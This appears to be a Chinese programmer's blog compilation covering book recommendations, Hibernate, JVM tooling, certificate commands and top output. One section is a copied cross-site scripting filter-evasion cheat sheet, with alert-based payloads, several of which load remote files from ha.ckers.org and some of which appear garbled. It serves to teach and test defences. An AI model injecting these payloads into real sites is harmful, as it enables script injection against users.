[轉] 每位認真的程式設計師都要讀的10本經典書

1. 英文:  The Pragmatic Programmer-From Journeyman to Master
中文: 程序員修煉之道︰從小工到專家︰評注版

2. 英文: The Mythical Man-Month: Essays on Software Engineering, Anniversary Edition (2nd Edition)
中文: 人月神話:軟體專案管理之道(20週年)

3. 英文: Clean Code: A Handbook of Agile Software Craftsmanship
中文: 無瑕的程式碼-敏捷軟體開發技巧守則

4. 英文: The Clean Coder: A Code of Conduct for Professional Programmers (Robert C. Martin Series)
中文:  無瑕的程式碼番外篇-專業程式設計師的生存之道

5. 英文: Refactoring: Improving the Design of Existing Code
中文: 重構─改善既有程式的設計, 2/e

6. 英文: Working Effectively with Legacy Code
中文: 修改代碼的藝術

7. 英文: Code Complete: A Practical Handbook of Software Construction, Second Edition
中文: 代碼大全 2

8. 英文: Head First Design Patterns
中文:  深入淺出設計模式 

9. 英文:  Peopleware: Productive Projects and Teams (3rd Edition)
中文:  Peopleware:腦力密集產業的人才管理之道(增訂版) 

10. Soft Skills: The software developer’s life manual

參考來源:http://softnshare.wordpress.com/2016/02/24/每位認真的程式設計師都要讀的10本經典書/

[Security] XSS攻擊手法介紹

1. 改變字元大小寫
    alert(‘d’)

2. 利用多加一些其它字元來規避Regular Expression的檢查
    <alert(‘c’)//
    http://t.js
    " SRC="t.js">
    http://t.js
    ‘" SRC="t.js">
    ` SRC="t.js">
    http://t.js

3. 以其它副檔名取代.js
    http://bad.jpg

4. 將Javascript寫在CSS檔裡
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
       example:
          body {
               background-image: url(‘javascript:alert(“XSS");’)
          }

5. 在script的tag裡加入一些其它字元
   
    http://t.js

6. 使用tab或是new line來規避
    <img src="jav ascr ipt:alert(‘XSS3’)">
    <img src="jav ascr ipt:alert(‘XSS3’)">
    <IMG SRC="jav ascript:alert(‘XSS’);">
         -> tag
         -> new line

7. 使用"\"來規避
    <STYLE>@im\port’\ja\vasc\ript:alert(“XSS32″)’;</STYLE>
    <IMG STYLE=’xss:expre\ssion(alert(“XSS33″))’>
    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31’));">
    <A STYLE=’no\xss:noxss(“*//*"); xss:ex/*XSS*//*/*/pression(alert(“XSS"))’>

8. 使用Hex encode來規避(也可能會把";"拿掉)
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31’));">
        原始碼:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31’));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
        原始碼:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">

9. script in HTML tag
    <body onload=」alert(‘onload’)」>
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. 在swf裡含有xss的code
    http://ha.ckers.org/xss.swf

11. 利用CDATA將xss的code拆開,再組合起來。
    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(‘XSS’);">]]>
    </C></X>
    </xml>
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. 利用HTML+TIME。
    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2″>
    <t:set attributeName="innerHTML" to="anywordalert(“XSS")">
    </BODY></HTML>

13. 透過META寫入Cookie。
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)">

14. javascript in src , href , url
   
    <img src="javascript:alert(‘XSS3’)">
    <IMG DYNSRC="javascript:alert(‘XSS20’)">
    <IMG LOWSRC="javascript:alert(‘XSS21’)">
    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24’);">
   
    <TABLE BACKGROUND="javascript:alert(‘XSS29’)">
    <DIV STYLE="background-image: url(javascript:alert(‘XSS30’))">
    <STYLE TYPE="text/css">.XSS{background image:url(“javascript:alert(‘XSS35’)");}
    </STYLE><A CLASS=XSS></A>
    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>

文章來源: Cross Site Scripting(XSS)攻擊手法介紹
http://htmlpurifier.org/live/smoketests/xssAttacks.php

Java Hibernate.initialize() issue

最近同事遇到備份table(Model)某些幾筆資料會處於lazyinitializer狀態,欄位全是null的情形,
這幾筆正好都是在之前有get過其他Model然後該Model有@ManyToOne關連到這個table的,
由於是直接用dao.list()撈出來,dao裡面是單純的用session.createCriteria(clazz).list()做,
奇怪的是即使已經做了Hibernate.initialize(XXX),用debug看撈出來的XXX屬性還是null,
正當百思不得其解時,我用debug看getter XXX方法,結果竟然有值!
原來Hibernate.initialize()是對proxy做initialze,不是對該Model直接賦予值,因此還是要從getter拿屬性才會是正確的,
然後再看同事的備份table方法,是撈出來的Model List直接透過new ObjectMapper().writeValueAsString(list)轉成json,
這個list並沒有經過getter拿屬性,因此才會有幾筆lazyinitializer的資料欄位是null,
其實fetch = FetchType.LAZY屬性Hibernate session會從proxyByKey的Hashmap拿,這種必須透過getter才能真正拿到值,
(只要宣告成fetch = FetchType.LAZY的屬性都有機會變null,@OneToMany的屬性也是一樣,只是@ManyToOne是每次必變null)

所以備份table issue總結如下:
解法1:
不要偷懶全部屬性都用getter,但這樣每個屬性都要寫…

解法2:
還是維持new ObjectMapper().writeValueAsString(list)
做dao.list()之前先session.clear() –> 強迫session中斷就可以更新model,注意flush()或refresh()也沒用,一定要用clear()

解法3:
把XXX屬性的@ManyToOne(fetch = FetchType.LAZY)改成FetchType.EAGER
這樣每次撈此Model都會順便直接初始化XXX屬性

中國聯通APN

中國聯通APN存取點: 3GNET

JVM分析的2個工具(JVisualVM&GCViewer)

看OutOfMemory:
a.加jvm參數:
-XX:+HeapDumpOnOutOfMemoryError
b.手動產生dump file: (模擬OutOfMemory發生, OOM產生檔案路徑: %TOMCAT_HOME%/bin/java_pid.hprof)
用jdk/bin下的jconsole打開pid
到 MBeans > com.sun.management > HotSpotDiagnostics > Operations |DumpHeap > p1輸入要產生的hprof檔名(預設是String, 檔案產生在jconsole同一層目錄)
c.用jdk/bin下的jvisualvm打開java_pid.hprof檔案

看GC log:
a.加jvm參數:
-verbose:gc -Xloggc:gc.log
b.執行tomcat (產生檔案路徑: %TOMCAT_HOME%/bin/gc.log)
c.下載GCViewer.jar用此工具打開gc.log

參考資料: JVM分析的2個工具
http://www.blogjava.net/fastzch/archive/2008/07/20/216240.html

OAuth 2.0 系列文目錄

https://blog.yorkxin.org/posts/2013/09/30/oauth2-1-introduction/

Web Security

HTTP Headers的資安議題:
http://devco.re/blog/2014/03/10/security-issues-of-http-headers-1/

防止CSRF攻擊:
http://blog.jdriven.com/2014/10/stateless-spring-security-part-1-stateless-csrf-protection/

幫Spring Security加上x-auth-token:
http://blog.jdriven.com/2014/10/stateless-spring-security-part-2-stateless-authentication/

弱點掃描軟體:
Burp Suite / N-Stalker / nessus

Authentication using certificates, Tomcat and Spring security

Use LDAPS for Spring Security:
http://l-lin.github.io/2014/09/09/Auth_with_certificates_Tomcat_spring/

– 顯示LDAPS certificate:
openssl s_client -showcerts -connect myserver:636
– 存成X509 certificate檔:
echo -n | openssl s_client -connect myserver:636 | sed -ne ‘/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p’ > myserver.crt

– 儲存certificate到JRE: (預設密碼:changeit)
keytool -import -keystore /opt/jdk7/jre/lib/security/cacerts -alias myserver -file myserver.crt
– 刪除certificate:
keytool -delete -alias myserver -keystore /opt/jdk7/jre/lib/security/cacerts -storepass changeit

– Client certificate over SSL
http://stackoverflow.com/questions/875467/java-client-certificates-over-https-ssl

-Djavax.net.ssl.keyStoreType=pkcs12
-Djavax.net.ssl.trustStoreType=jks
-Djavax.net.ssl.keyStore=clientcertificate.p12
-Djavax.net.ssl.trustStore=gridserver.keystore
-Djavax.net.debug=ssl # very verbose debug
-Djavax.net.ssl.keyStorePassword=$PASS
-Djavax.net.ssl.trustStorePassword=$PASS

top command explanation

top – 16:23:02 up 14 days, 23:08, 7 users, load average: 0.01, 0.04, 0.12
Tasks: 233 total, 1 running, 232 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.7 us, 0.3 sy, 0.0 ni, 98.6 id, 0.3 wa, 0.1 hi, 0.1 si, 0.0 st
KiB Mem: 16368856 total, 11506728 used, 4862128 free, 544236 buffers
KiB Swap: 8200188 total, 0 used, 8200188 free, 6060844 cached

a: PID — Process Id
The task’s unique process ID, which periodically wraps, though
never restarting at zero.

b: PPID — Parent Process Pid
The process ID of a task’s parent.

c: RUSER — Real User Name
The real user name of the task’s owner.

d: UID — User Id
The effective user ID of the task’s owner.

e: USER — User Name
The effective user name of the task’s owner.

f: GROUP — Group Name
The effective group name of the task’s owner.

g: TTY — Controlling Tty
The name of the controlling terminal. This is usually the
device (serial port, pty, etc.) from which the process was
started, and which it uses for input or output. However, a
task need not be associated with a terminal, in which case
you’ll see ‘?’ displayed.

h: PR — Priority
The priority of the task.

i: NI — Nice value
The nice value of the task. A negative nice value means higher
priority, whereas a positive nice value means lower priority.
Zero in this field simply means priority will not be adjusted
in determining a task’s dispatchability.

j: P — Last used CPU (SMP)
A number representing the last used processor. In a true SMP
environment this will likely change frequently since the kernel
intentionally uses weak affinity. Also, the very act of
running top may break this weak affinity and cause more
processes to change CPUs more often (because of the extra
demand for cpu time).

k: %CPU — CPU usage
The task’s share of the elapsed CPU time since the last screen
update, expressed as a percentage of total CPU time. In a true
SMP environment, if ‘Irix mode’ is Off, top will operate in
‘Solaris mode’ where a task’s cpu usage will be divided by the
total number of CPUs. You toggle ‘Irix/Solaris’ modes with the
‘I’ interactive command.

l: TIME — CPU Time
Total CPU time the task has used since it started. When
‘Cumulative mode’ is On, each process is listed with the cpu
time that it and its dead children has used. You toggle
‘Cumulative mode’ with ‘S’, which is a command-line option and
an interactive command. See the ‘S’ interactive command for
additional information regarding this mode.

m: TIME+ — CPU Time, hundredths
The same as ‘TIME’, but reflecting more granularity through
hundredths of a second.

n: %MEM — Memory usage (RES)
A task’s currently used share of available physical memory.

o: VIRT — Virtual Image (kb)
The total amount of virtual memory used by the task. It
includes all code, data and shared libraries plus pages that
have been swapped out and pages that have been mapped but not
used.

p: SWAP — Swapped size (kb)
Memory that is not resident but is present in a task. This is
memory that has been swapped out but could include additional
non-resident memory. This column is calculated by subtracting
physical memory from virtual memory.

q: RES — Resident size (kb)
The non-swapped physical memory a task has used.

r: CODE — Code size (kb)
The amount of virtual memory devoted to executable code, also
known as the ‘text resident set’ size or TRS.

s: DATA — Data+Stack size (kb)
The amount of virtual memory devoted to other than executable
code, also known as the ‘data resident set’ size or DRS.

t: SHR — Shared Mem size (kb)
The amount of shared memory used by a task. It simply reflects
memory that could be potentially shared with other processes.

u: nFLT — Page Fault count
The number of major page faults that have occurred for a task.
A page fault occurs when a process attempts to read from or
write to a virtual page that is not currently present in its
address space. A major page fault is when backing storage
access (such as a disk) is involved in making that page
available.

v: nDRT — Dirty Pages count
The number of pages that have been modified since they were
last written to disk. Dirty pages must be written to disk
before the corresponding physical memory location can be used
for some other virtual page.

w: S — Process Status
The status of the task which can be one of:
‘D’ = uninterruptible sleep
‘R’ = running
‘S’ = sleeping
‘T’ = traced or stopped
‘Z’ = zombie

[JS] 偵測設備是否支援觸控

$(document).ready(function() {
var $body = $(‘body’);
var detectMouse = function(e){
if (e.type === ‘mousedown’) {
alert(‘Mouse interaction!’);
}
else if (e.type === ‘touchstart’) {
alert(‘Touch interaction!’);
}
// remove event bindings, so it only runs once
$body.off(‘mousedown touchstart’, detectMouse);
}
// attach both events to body
$body.on(‘mousedown touchstart’, detectMouse);
});

參考來源:http://stackoverflow.com/questions/7838680/detecting-that-the-browser-has-no-mouse-and-is-touch-only